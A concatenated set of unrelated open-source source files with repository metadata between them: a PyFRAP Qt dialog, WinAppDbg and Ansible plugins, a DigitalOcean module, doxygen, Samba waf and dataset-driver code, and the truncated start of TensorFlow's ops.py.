self.grid.addWidget(self.qleName,1,2) self.grid.addWidget(self.comboMeth,2,2) self.grid.addWidget(self.qleMaxFun,3,2) self.grid.addWidget(self.qleOptTol,4,2) self.grid.addWidget(self.qleKinetic,5,2) self.grid.addWidget(self.cbSaveTrack,6,2) self.grid.addWidget(self.lblHeadX0,8,1,1,2,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.lblX0D,9,1) self.grid.addWidget(self.lblX0Prod,10,1) self.grid.addWidget(self.lblX0Degr,11,1) self.grid.addWidget(self.qleX0D,9,2) self.grid.addWidget(self.qleX0Prod,10,2) self.grid.addWidget(self.qleX0Degr,11,2) self.grid.addWidget(self.lblHeadBounds,0,3,1,3,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.qleLBD,1,3) self.grid.addWidget(self.qleLBProd,2,3) self.grid.addWidget(self.qleLBDegr,3,3) self.grid.addWidget(self.lblBoundsD,1,4,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.lblBoundsProd,2,4,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.lblBoundsDegr,3,4,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.qleUBD,1,5) self.grid.addWidget(self.qleUBProd,2,5) self.grid.addWidget(self.qleUBDegr,3,5) self.grid.addWidget(self.lblHeadROI,5,3,1,3,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.ROIList,6,3,5,3) self.grid.addWidget(self.btnAddROI,11,3) self.grid.addWidget(self.btnRemoveROI,11,5) self.grid.addWidget(self.lblHeadOptions,0,6,1,2,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.lblEquOn,1,6) self.grid.addWidget(self.lblFitPinned,2,6) self.grid.addWidget(self.lblFitProd,3,6) self.grid.addWidget(self.lblFitDegr,4,6) self.grid.addWidget(self.lblFitCutOffT,5,6) self.grid.addWidget(self.lblCutOffT,6,6) self.grid.addWidget(self.cbEquOn,1,7) self.grid.addWidget(self.cbFitPinned,2,7) self.grid.addWidget(self.cbFitProd,3,7) self.grid.addWidget(self.cbFitDegr,4,7) self.grid.addWidget(self.cbFitCutOffT,5,7) self.grid.addWidget(self.qleCutOffT,6,7) self.resize(900,700) self.setWindowTitle("Fit Settings") self.show() def validateBound(self,b): if b==None or b=="": return True try: c=float(b) return True except: printError("Invalid boundary entered.") return False def updateROIList(self): self.ROIList.clear() for r in self.fit.ROIsFitted: QtGui.QTreeWidgetItem(self.ROIList,[r.name]) return self.ROIList def initComboMeth(self): idx=self.comboMeth.findText(self.fit.optMeth,QtCore.Qt.MatchExactly) self.comboMeth.setCurrentIndex(idx) def updateCBs(self): self.cbEquOn.setCheckState(2*int(self.fit.equOn)) self.cbFitPinned.setCheckState(2*int(self.fit.fitPinned)) self.cbFitProd.setCheckState(2*int(self.fit.fitProd)) self.cbFitDegr.setCheckState(2*int(self.fit.fitDegr)) self.cbFitCutOffT.setCheckState(2*int(self.fit.fitCutOffT)) self.cbSaveTrack.setCheckState(2*int(self.fit.saveTrack)) def checkEquOn(self,val): self.fit.setEqu(bool(2*val)) def checkFitPinned(self,val): self.fit.setFitPinned(bool(2*val)) def checkFitProd(self,val): self.fit.setFitProd(bool(2*val)) def checkFitDegr(self,val): self.fit.setFitDegr(bool(2*val)) def checkFitCutOffT(self,val): self.fit.setFitCutOffT(bool(2*val)) def checkSaveTrack(self,val): self.fit.setSaveTrack(bool(2*val)) def setLBD(self): text=str(self.qleLBD.text()) if text=="" or text=='None': text=None self.fit.setLBD(text) else: if self.validateBound(text): self.fit.setLBD(float(text)) def setLBProd(self): text=str(self.qleLBProd.text()) if text=="" or text=='None': text=None self.fit.setLBProd(text) else: if self.validateBound(text): self.fit.setLBProd(float(text)) def setLBDegr(self): text=str(self.qleLBDegr.text()) if text=="" or text=='None': text=None self.fit.setLBDegr(text) else: if self.validateBound(text): self.fit.setLBDegr(float(text)) def setUBD(self): text=str(self.qleUBD.text()) if text=="" or text=='None': text=None self.fit.setUBD(text) else: if self.validateBound(text): self.fit.setUBD(float(text)) def setUBProd(self): text=str(self.qleUBProd.text()) if text=="" or text=='None': text=None self.fit.setUBProd(text) else: if self.validateBound(text): self.fit.setUBProd(float(text)) def setUBDegr(self): text=str(self.qleUBDegr.text()) if text=="" or text=='None': text=None self.fit.setUBDegr(text) else: if self.validateBound(text): self.fit.setUBDegr(float(text)) def setX0D(self): text=str(self.qleX0D.text()) if text=="": printWarning("You must give a value for x0.") return self.fit.setX0D(float(text)) def setX0Prod(self): text=str(self.qleX0Prod.text()) if text=="": printWarning("You must give a value for x0.") return self.fit.setX0Prod(float(text)) def setX0Degr(self): text=str(self.qleX0Degr.text()) if text=="": printWarning("You must give a value for x0.") return self.fit.setX0Degr(float(text)) def setName(self): self.fit.setName(str(self.qleName.text())) def setOptMeth(self): self.fit.setOptMeth(str(self.comboMeth.currentText())) def setKineticTimeScale(self): self.fit.setKineticTimeScale(float(str(self.qleKinetic.text()))) def setMaxfun(self): self.fit.setMaxfun(int(str(self.qleMaxFun.text()))) def setOptTol(self): self.fit.setOptTol(float(str(self.qleOptTol.text()))) def setCutOffT(self): self.fit.setCutOffT(float(str(self.qleCutOffT.text()))) def addROI(self): nameList=pyfrp_misc_module.objAttrToList(self.fit.embryo.ROIs,'name') selectorDialog = pyfrp_gui_basics.basicSelectorDialog(nameList,self) if selectorDialog.exec_(): selectedROIName = selectorDialog.getItem() if selectedROIName==None: return selectedROI=self.fit.embryo.ROIs[nameList.index(selectedROIName)] if selectedROI not in self.fit.ROIsFitted: self.fit.addROI(selectedROI) self.updateROIList() def removeROI(self): idx=self.ROIList.indexFromItem(self.ROIList.currentItem()).row() self.fit.removeROI(self.fit.ROIsFitted[idx]) self.updateROIList() #=================================================================================================================================== #Dialogs for fitting progress #=================================================================================================================================== class fittingProgressDialog(pyfrp_gui_basics.waitDialog): def __init__(self,parent): super(fittingProgressDialog,self).__init__(parent) #Labels self.lblName.setText("Fitting in progress...") #Window title self.setWindowTitle('Fitting progress') self.show() class fittingThread(pyfrp_gui_basics.pyfrpThread): def __init__(self, fit=None, parent=None): super(fittingThread,self).__init__(parent) self.obj=fit self.fit=fit def runTask(self,debug=False): self.fit.run(debug=debug)
gpl-3.0
goodwinnk/intellij-community
python/helpers/pydev/pydevd_attach_to_process/winappdbg/plugins/__init__.py
102
1755
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) 2009-2014, Mario Vilas # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice,this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ Plugins folder for the WinAppDbg interactive debugger. """ __revision__ = "$Id: __init__.py 1125 2012-10-22 14:54:39Z qvasimodo $"
apache-2.0
vmindru/ansible
lib/ansible/plugins/connection/libvirt_lxc.py
47
7419
# Based on local.py (c) 2012, Michael DeHaan <michael.dehaan@gmail.com> # Based on chroot.py (c) 2013, Maykel Moya <mmoya@speedyrails.com> # (c) 2013, Michael Scherer <misc@zarb.org> # (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com> # (c) 2017 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = """ author: Michael Scherer <misc@zarb.org> connection: libvirt_lxc short_description: Run tasks in lxc containers via libvirt description: - Run commands or put/fetch files to an existing lxc container using libvirt version_added: "2.0" options: remote_addr: description: - Container identifier default: The set user as per docker's configuration vars: - name: ansible_host - name: ansible_libvirt_lxc_host """ import distutils.spawn import os import os.path import subprocess import traceback from ansible import constants as C from ansible.errors import AnsibleError from ansible.module_utils.six.moves import shlex_quote from ansible.module_utils._text import to_bytes from ansible.plugins.connection import ConnectionBase, BUFSIZE from ansible.utils.display import Display display = Display() class Connection(ConnectionBase): ''' Local lxc based connections ''' transport = 'libvirt_lxc' has_pipelining = True # su currently has an undiagnosed issue with calculating the file # checksums (so copy, for instance, doesn't work right) # Have to look into that before re-enabling this default_user = 'root' has_tty = False def __init__(self, play_context, new_stdin, *args, **kwargs): super(Connection, self).__init__(play_context, new_stdin, *args, **kwargs) self.lxc = self._play_context.remote_addr self.virsh = self._search_executable('virsh') self._check_domain(self.lxc) def _search_executable(self, executable): cmd = distutils.spawn.find_executable(executable) if not cmd: raise AnsibleError("%s command not found in PATH") % executable return cmd def _check_domain(self, domain): p = subprocess.Popen([self.virsh, '-q', '-c', 'lxc:///', 'dominfo', to_bytes(domain)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) p.communicate() if p.returncode: raise AnsibleError("%s is not a lxc defined in libvirt" % domain) def _connect(self): ''' connect to the lxc; nothing to do here ''' super(Connection, self)._connect() if not self._connected: display.vvv("THIS IS A LOCAL LXC DIR", host=self.lxc) self._connected = True def _buffered_exec_command(self, cmd, stdin=subprocess.PIPE): ''' run a command on the chroot. This is only needed for implementing put_file() get_file() so that we don't have to read the whole file into memory. compared to exec_command() it looses some niceties like being able to return the process's exit code immediately. ''' executable = C.DEFAULT_EXECUTABLE.split()[0] if C.DEFAULT_EXECUTABLE else '/bin/sh' local_cmd = [self.virsh, '-q', '-c', 'lxc:///', 'lxc-enter-namespace'] if C.DEFAULT_LIBVIRT_LXC_NOSECLABEL: local_cmd += ['--noseclabel'] local_cmd += [self.lxc, '--', executable, '-c', cmd] display.vvv("EXEC %s" % (local_cmd,), host=self.lxc) local_cmd = [to_bytes(i, errors='surrogate_or_strict') for i in local_cmd] p = subprocess.Popen(local_cmd, shell=False, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE) return p def exec_command(self, cmd, in_data=None, sudoable=False): ''' run a command on the chroot ''' super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable) p = self._buffered_exec_command(cmd) stdout, stderr = p.communicate(in_data) return (p.returncode, stdout, stderr) def _prefix_login_path(self, remote_path): ''' Make sure that we put files into a standard path If a path is relative, then we need to choose where to put it. ssh chooses $HOME but we aren't guaranteed that a home dir will exist in any given chroot. So for now we're choosing "/" instead. This also happens to be the former default. Can revisit using $HOME instead if it's a problem ''' if not remote_path.startswith(os.path.sep): remote_path = os.path.join(os.path.sep, remote_path) return os.path.normpath(remote_path) def put_file(self, in_path, out_path): ''' transfer a file from local to lxc ''' super(Connection, self).put_file(in_path, out_path) display.vvv("PUT %s TO %s" % (in_path, out_path), host=self.lxc) out_path = shlex_quote(self._prefix_login_path(out_path)) try: with open(to_bytes(in_path, errors='surrogate_or_strict'), 'rb') as in_file: if not os.fstat(in_file.fileno()).st_size: count = ' count=0' else: count = '' try: p = self._buffered_exec_command('dd of=%s bs=%s%s' % (out_path, BUFSIZE, count), stdin=in_file) except OSError: raise AnsibleError("chroot connection requires dd command in the chroot") try: stdout, stderr = p.communicate() except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file %s to %s" % (in_path, out_path)) if p.returncode != 0: raise AnsibleError("failed to transfer file %s to %s:\n%s\n%s" % (in_path, out_path, stdout, stderr)) except IOError: raise AnsibleError("file or module does not exist at: %s" % in_path) def fetch_file(self, in_path, out_path): ''' fetch a file from lxc to local ''' super(Connection, self).fetch_file(in_path, out_path) display.vvv("FETCH %s TO %s" % (in_path, out_path), host=self.lxc) in_path = shlex_quote(self._prefix_login_path(in_path)) try: p = self._buffered_exec_command('dd if=%s bs=%s' % (in_path, BUFSIZE)) except OSError: raise AnsibleError("chroot connection requires dd command in the chroot") with open(to_bytes(out_path, errors='surrogate_or_strict'), 'wb+') as out_file: try: chunk = p.stdout.read(BUFSIZE) while chunk: out_file.write(chunk) chunk = p.stdout.read(BUFSIZE) except Exception: traceback.print_exc() raise AnsibleError("failed to transfer file %s to %s" % (in_path, out_path)) stdout, stderr = p.communicate() if p.returncode != 0: raise AnsibleError("failed to transfer file %s to %s:\n%s\n%s" % (in_path, out_path, stdout, stderr)) def close(self): ''' terminate the connection; nothing to do here ''' super(Connection, self).close() self._connected = False
gpl-3.0
awkspace/ansible
lib/ansible/modules/cloud/digital_ocean/digital_ocean_tag_facts.py
29
2926
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2018, Ansible Project # Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community' } DOCUMENTATION = ''' --- module: digital_ocean_tag_facts short_description: Gather facts about DigitalOcean tags description: - This module can be used to gather facts about DigitalOcean provided tags. author: "Abhijeet Kasurde (@Akasurde)" version_added: "2.6" options: tag_name: description: - Tag name that can be used to identify and reference a tag. required: false requirements: - "python >= 2.6" extends_documentation_fragment: digital_ocean.documentation ''' EXAMPLES = ''' - name: Gather facts about all tags digital_ocean_tag_facts: oauth_token: "{{ oauth_token }}" - name: Gather facts about tag with given name digital_ocean_tag_facts: oauth_token: "{{ oauth_token }}" tag_name: "extra_awesome_tag" - name: Get resources from tag name digital_ocean_tag_facts: register: resp_out - set_fact: resources: "{{ item.resources }}" loop: "{{ resp_out.data|json_query(name) }}" vars: name: "[?name=='extra_awesome_tag']" - debug: var=resources ''' RETURN = ''' data: description: DigitalOcean tag facts returned: success type: list sample: [ { "name": "extra-awesome", "resources": { "droplets": { "count": 1, ... } } }, ] ''' from traceback import format_exc from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.digital_ocean import DigitalOceanHelper from ansible.module_utils._text import to_native def core(module): tag_name = module.params.get('tag_name', None) rest = DigitalOceanHelper(module) base_url = 'tags?' if tag_name is not None: response = rest.get("%s/%s" % (base_url, tag_name)) status_code = response.status_code if status_code != 200: module.fail_json(msg="Failed to retrieve tags for DigitalOcean") resp_json = response.json tag = resp_json['tag'] else: tag = rest.get_paginated_data(base_url=base_url, data_key_name='tags') module.exit_json(changed=False, data=tag) def main(): argument_spec = DigitalOceanHelper.digital_ocean_argument_spec() argument_spec.update( tag_name=dict(type='str', required=False), ) module = AnsibleModule(argument_spec=argument_spec) try: core(module) except Exception as e: module.fail_json(msg=to_native(e), exception=format_exc()) if __name__ == '__main__': main()
gpl-3.0
rupumped/Gen2-UHF-RFID-Reader
gr-rfid/docs/doxygen/doxyxml/generated/index.py
344
1871
#!/usr/bin/env python """ Generated Mon Feb 9 19:08:05 2009 by generateDS.py. """ from xml.dom import minidom import os import sys import compound import indexsuper as supermod class DoxygenTypeSub(supermod.DoxygenType): def __init__(self, version=None, compound=None): supermod.DoxygenType.__init__(self, version, compound) def find_compounds_and_members(self, details): """ Returns a list of all compounds and their members which match details """ results = [] for compound in self.compound: members = compound.find_members(details) if members: results.append([compound, members]) else: if details.match(compound): results.append([compound, []]) return results supermod.DoxygenType.subclass = DoxygenTypeSub # end class DoxygenTypeSub class CompoundTypeSub(supermod.CompoundType): def __init__(self, kind=None, refid=None, name='', member=None): supermod.CompoundType.__init__(self, kind, refid, name, member) def find_members(self, details): """ Returns a list of all members which match details """ results = [] for member in self.member: if details.match(member): results.append(member) return results supermod.CompoundType.subclass = CompoundTypeSub # end class CompoundTypeSub class MemberTypeSub(supermod.MemberType): def __init__(self, kind=None, refid=None, name=''): supermod.MemberType.__init__(self, kind, refid, name) supermod.MemberType.subclass = MemberTypeSub # end class MemberTypeSub def parse(inFilename): doc = minidom.parse(inFilename) rootNode = doc.documentElement rootObj = supermod.DoxygenType.factory() rootObj.build(rootNode) return rootObj
gpl-3.0
obnoxxx/samba
buildtools/wafsamba/gccdeps.py
33
3350
# encoding: utf-8 # Thomas Nagy, 2008-2010 (ita) """ Execute the tasks with gcc -MD, read the dependencies from the .d file and prepare the dependency calculation for the next run """ import os, re, threading import Task, Logs, Utils, preproc from TaskGen import before, after, feature lock = threading.Lock() preprocessor_flag = '-MD' @feature('cc') @before('apply_core') def add_mmd_cc(self): if self.env.get_flat('CCFLAGS').find(preprocessor_flag) < 0: self.env.append_value('CCFLAGS', preprocessor_flag) @feature('cxx') @before('apply_core') def add_mmd_cxx(self): if self.env.get_flat('CXXFLAGS').find(preprocessor_flag) < 0: self.env.append_value('CXXFLAGS', preprocessor_flag) def scan(self): "the scanner does not do anything initially" nodes = self.generator.bld.node_deps.get(self.unique_id(), []) names = [] return (nodes, names) re_o = re.compile("\.o$") re_src = re.compile("^(\.\.)[\\/](.*)$") def post_run(self): # The following code is executed by threads, it is not safe, so a lock is needed... if getattr(self, 'cached', None): return Task.Task.post_run(self) name = self.outputs[0].abspath(self.env) name = re_o.sub('.d', name) txt = Utils.readf(name) #os.unlink(name) txt = txt.replace('\\\n', '') lst = txt.strip().split(':') val = ":".join(lst[1:]) val = val.split() nodes = [] bld = self.generator.bld f = re.compile("^("+self.env.variant()+"|\.\.)[\\/](.*)$") for x in val: if os.path.isabs(x): if not preproc.go_absolute: continue lock.acquire() try: node = bld.root.find_resource(x) finally: lock.release() else: g = re.search(re_src, x) if g: x = g.group(2) lock.acquire() try: node = bld.bldnode.parent.find_resource(x) finally: lock.release() else: g = re.search(f, x) if g: x = g.group(2) lock.acquire() try: node = bld.srcnode.find_resource(x) finally: lock.release() if id(node) == id(self.inputs[0]): # ignore the source file, it is already in the dependencies # this way, successful config tests may be retrieved from the cache continue if not node: raise ValueError('could not find %r for %r' % (x, self)) else: nodes.append(node) Logs.debug('deps: real scanner for %s returned %s' % (str(self), str(nodes))) bld.node_deps[self.unique_id()] = nodes bld.raw_deps[self.unique_id()] = [] try: del self.cache_sig except: pass Task.Task.post_run(self) import Constants, Utils def sig_implicit_deps(self): try: return Task.Task.sig_implicit_deps(self) except Utils.WafError: return Constants.SIG_NIL for name in 'cc cxx'.split(): try: cls = Task.TaskBase.classes[name] except KeyError: pass else: cls.post_run = post_run cls.scan = scan cls.sig_implicit_deps = sig_implicit_deps
gpl-3.0
petercable/mi-dataset
mi/dataset/driver/ctdmo_ghqr/imodem/ctdmo_ghqr_imodem_telemetered_driver.py
7
2169
#!/usr/bin/env python """ @package mi.dataset.driver.ctdmo_ghqr.imodem @file mi-dataset/mi/dataset/driver/ctdmo_ghqr/imodem/ctdmo_ghqr_imodem_telemetered_driver.py @author Mark Worden @brief Driver for the ctdmo_ghqr_imodem instrument Release notes: Initial Release """ from mi.dataset.dataset_parser import DataSetDriverConfigKeys from mi.dataset.dataset_driver import SimpleDatasetDriver from mi.dataset.parser.ctdmo_ghqr_imodem import CtdmoGhqrImodemParser, \ CtdmoGhqrImodemParticleClassKey, \ CtdmoGhqrImodemMetadataTelemeteredDataParticle, \ CtdmoGhqrImodemInstrumentTelemeteredDataParticle from mi.core.versioning import version @version("15.6.1") def parse(unused, source_file_path, particle_data_handler): """ This is the method called by Uframe :param unused :param source_file_path This is the full path and filename of the file to be parsed :param particle_data_handler Java Object to consume the output of the parser :return particle_data_handler """ with open(source_file_path, 'rb') as stream_handle: driver = CtdmoGhqrImodemTelemeteredDriver(unused, stream_handle, particle_data_handler) driver.processFileStream() return particle_data_handler class CtdmoGhqrImodemTelemeteredDriver(SimpleDatasetDriver): """ All this needs to do is create a concrete _build_parser method """ def _build_parser(self, stream_handle): parser_config = { DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.ctdmo_ghqr_imodem', DataSetDriverConfigKeys.PARTICLE_CLASS: None, DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: { CtdmoGhqrImodemParticleClassKey.METADATA_PARTICLE_CLASS: CtdmoGhqrImodemMetadataTelemeteredDataParticle, CtdmoGhqrImodemParticleClassKey.INSTRUMENT_PARTICLE_CLASS: CtdmoGhqrImodemInstrumentTelemeteredDataParticle, } } parser = CtdmoGhqrImodemParser(parser_config, stream_handle, self._exception_callback) return parser
bsd-2-clause
dyoung418/tensorflow
tensorflow/python/framework/ops.py
1
190049
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Classes and functions used to construct graphs.""" # pylint: disable=g-bad-name from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import linecache import re import sys import threading import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.framework import attr_value_pb2 from tensorflow.core.framework import function_pb2 from tensorflow.core.framework import graph_pb2 from tensorflow.core.framework import node_def_pb2 from tensorflow.core.framework import op_def_pb2 from tensorflow.core.framework import versions_pb2 from tensorflow.python import pywrap_tensorflow as c_api from tensorflow.python.eager import context from tensorflow.python.eager import core from tensorflow.python.eager import tape from tensorflow.python.framework import c_api_util from tensorflow.python.framework import device as pydev from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import op_def_registry from tensorflow.python.framework import registry from tensorflow.python.framework import tensor_shape from tensorflow.python.framework import versions from tensorflow.python.platform import app from tensorflow.python.platform import tf_logging as logging from tensorflow.python.util import compat from tensorflow.python.util import decorator_utils from tensorflow.python.util import tf_contextlib # Temporary global switch determining if we should enable the work-in-progress # calls to the C API. Currently disabled by default but can be manually enabled # e.g. in tests. This will be removed once all functionality is supported and # there's no performance penalty with it enabled. # # TODO(skyewm) before we can remove this: # - functions # - import_graph_def() incrementally adds inputs to ops (i.e. creates an # Operation and then calls _add_input()). The current code requires that all # inputs be specified when creating the Operation (since we call # TF_FinishOperation()). # - ops_test.py (and others?) create unregistered op types # - while loop # - performance (e.g. delete/refactor redundant Python functionality, switch to # new session API) _USE_C_API = False def tensor_id(tensor): """Returns a unique identifier for this Tensor.""" return tensor._id # pylint: disable=protected-access class _NullContextmanager(object): def __enter__(self): pass def __exit__(self, type_arg, value_arg, traceback_arg): return False # False values do not suppress exceptions def _override_helper(clazz_object, operator, func): """Overrides (string) operator on Tensors to call func. Args: clazz_object: the class to override for; either Tensor or SparseTensor. operator: the string name of the operator to override. func: the function that replaces the overridden operator. Raises: ValueError: If operator has already been overwritten, or if operator is not allowed to be overwritten. """ existing = getattr(clazz_object, operator, None) if existing is not None: # Check to see if this is a default method-wrapper or slot wrapper which # will be true for the comparison operators. if not isinstance(existing, type(object.__lt__)): raise ValueError("operator %s cannot be overwritten again on class %s." % (operator, clazz_object)) if operator not in Tensor.OVERLOADABLE_OPERATORS: raise ValueError("Overriding %s is disallowed" % operator) setattr(clazz_object, operator, func) def _as_graph_element(obj): """Convert `obj` to a graph element if possible, otherwise return `None`. Args: obj: Object to convert. Returns: The result of `obj._as_graph_element()` if that method is available; otherwise `None`. """ conv_fn = getattr(obj, "_as_graph_element", None) if conv_fn and callable(conv_fn): return conv_fn() return None _TENSOR_LIKE_TYPES = tuple() def is_dense_tensor_like(t): """EXPERIMENTAL: Returns true if `t` implements the tensor interface. See `register_dense_tensor_like_type()` for the current definition of a "tensor-like type". Args: t: An object. Returns: True iff `t` is an instance of one of the registered "tensor-like" types. """ return isinstance(t, _TENSOR_LIKE_TYPES) def register_dense_tensor_like_type(tensor_type): """EXPERIMENTAL: Registers `tensor_type` as implementing the tensor interface. A "tensor-like type" can represent a single dense tensor, and implements the `name` and `dtype` properties. Args: tensor_type: A type implementing the tensor interface. Raises: TypeError: If `tensor_type` does not implement the tensor interface. """ try: if not isinstance(tensor_type.name, property): raise TypeError("Type %s does not define a `name` property") except AttributeError: raise TypeError("Type %s does not define a `name` property") try: if not isinstance(tensor_type.dtype, property): raise TypeError("Type %s does not define a `dtype` property") except AttributeError: raise TypeError("Type %s does not define a `dtype` property") # We expect this list to be small, so choose quadratic complexity # for registration, so that we have a tuple that can be used for # more efficient `isinstance` checks later. global _TENSOR_LIKE_TYPES _TENSOR_LIKE_TYPES = tuple(list(_TENSOR_LIKE_TYPES) + [tensor_type]) def uid(): """A unique (within this program execution) integer.""" return c_api.TFE_Py_UID() def numpy_text(tensor, is_repr=False): """Human readable representation of a tensor's numpy value.""" if tensor.dtype.is_numpy_compatible: text = repr(tensor.numpy()) if is_repr else str(tensor.numpy()) else: text = "<unprintable>" if "\n" in text: text = "\n" + text return text # NOTE(ebrevdo): Do not subclass this. If you do, I will break you on purpose. class _TensorLike(object): """Internal cls for grouping Tensor, SparseTensor, ..., for is_instance.""" pass class Tensor(_TensorLike): """Represents one of the outputs of an `Operation`. A `Tensor` is a symbolic handle to one of the outputs of an `Operation`. It does not hold the values of that operation's output, but instead provides a means of computing those values in a TensorFlow @{tf.Session}. This class has two primary purposes: 1. A `Tensor` can be passed as an input to another `Operation`. This builds a dataflow connection between operations, which enables TensorFlow to execute an entire `Graph` that represents a large, multi-step computation. 2. After the graph has been launched in a session, the value of the `Tensor` can be computed by passing it to @{tf.Session.run}. `t.eval()` is a shortcut for calling `tf.get_default_session().run(t)`. In the following example, `c`, `d`, and `e` are symbolic `Tensor` objects, whereas `result` is a numpy array that stores a concrete value: ```python # Build a dataflow graph. c = tf.constant([[1.0, 2.0], [3.0, 4.0]]) d = tf.constant([[1.0, 1.0], [0.0, 1.0]]) e = tf.matmul(c, d) # Construct a `Session` to execute the graph. sess = tf.Session() # Execute the graph and store the value that `e` represents in `result`. result = sess.run(e) ``` """ # List of Python operators that we allow to override. OVERLOADABLE_OPERATORS = { # Binary. "__add__", "__radd__", "__sub__", "__rsub__", "__mul__", "__rmul__", "__div__", "__rdiv__", "__truediv__", "__rtruediv__", "__floordiv__", "__rfloordiv__", "__mod__", "__rmod__", "__lt__", "__le__", "__gt__", "__ge__", "__and__", "__rand__", "__or__", "__ror__", "__xor__", "__rxor__", "__getitem__", "__pow__", "__rpow__", # Unary. "__invert__", "__neg__", "__abs__", "__matmul__", "__rmatmul__" } def __init__(self, op, value_index, dtype): """Creates a new `Tensor`. Args: op: An `Operation`. `Operation` that computes this tensor. value_index: An `int`. Index of the operation's endpoint that produces this tensor. dtype: A `DType`. Type of elements stored in this tensor. Raises: TypeError: If the op is not an `Operation`. """ if not isinstance(op, Operation): raise TypeError("op needs to be an Operation: %s" % op) self._op = op self._value_index = value_index self._dtype = dtypes.as_dtype(dtype) self._shape = tensor_shape.unknown_shape() # List of operations that use this Tensor as input. We maintain this list # to easily navigate a computation graph. self._consumers = [] # Attributes used for C++ shape inference. Not inspected, only forwarded. # If set, will be a HandleData object from cpp_shape_inference.proto. self._handle_data = None self._id = uid() @property def op(self): """The `Operation` that produces this tensor as an output.""" return self._op @property def dtype(self): """The `DType` of elements in this tensor.""" return self._dtype @property def graph(self): """The `Graph` that contains this tensor.""" return self._op.graph @property def name(self): """The string name of this tensor.""" if not self._op.name: raise ValueError("Operation was not named: %s" % self._op) return "%s:%d" % (self._op.name, self._value_index) @property def device(self): """The name of the device on which this tensor will be produced, or None.""" return self._op.device @property def shape(self): """Returns the `TensorShape` that represents the shape of this tensor. The shape is computed using shape inference functions that are registered in the Op for each `Operation`. See @{tf.TensorShape} for more details of what a shape represents. The inferred shape of a tensor is used to provide shape information without having to launch the graph in a session. This can be used for debugging, and providing early error messages. For example: ```python c = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]) print(c.shape) ==> TensorShape([Dimension(2), Dimension(3)]) d = tf.constant([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]]) print(d.shape) ==> TensorShape([Dimension(4), Dimension(2)]) # Raises a ValueError, because `c` and `d` do not have compatible # inner dimensions. e = tf.matmul(c, d) f = tf.matmul(c, d, transpose_a=True, transpose_b=True) print(f.shape) ==> TensorShape([Dimension(3), Dimension(4)]) ``` In some cases, the inferred shape may have unknown dimensions. If the caller has additional information about the values of these dimensions, `Tensor.set_shape()` can be used to augment the inferred shape. Returns: A `TensorShape` representing the shape of this tensor. """ return self._shape def __iter__(self): if context.in_graph_mode(): raise TypeError( "`Tensor` objects are not iterable when eager execution is not " "enabled. To iterate over this tensor use `tf.map_fn`.") shape = self._shape_tuple() if shape is None: raise TypeError("Cannot iterate over a tensor with unknown shape.") if not shape: raise TypeError("Cannot iterate over a scalar tensor.") if shape[0] is None: raise TypeError( "Cannot iterate over a tensor with unknown first dimension.") for i in xrange(shape[0]): yield self[i] def _shape_as_list(self): if self._shape.ndims is not None: return [dim.value for dim in self._shape.dims] else: return None def _shape_tuple(self): shape = self._shape_as_list() if shape is None: return None return tuple(shape) def _rank(self): """Integer rank of this Tensor, if 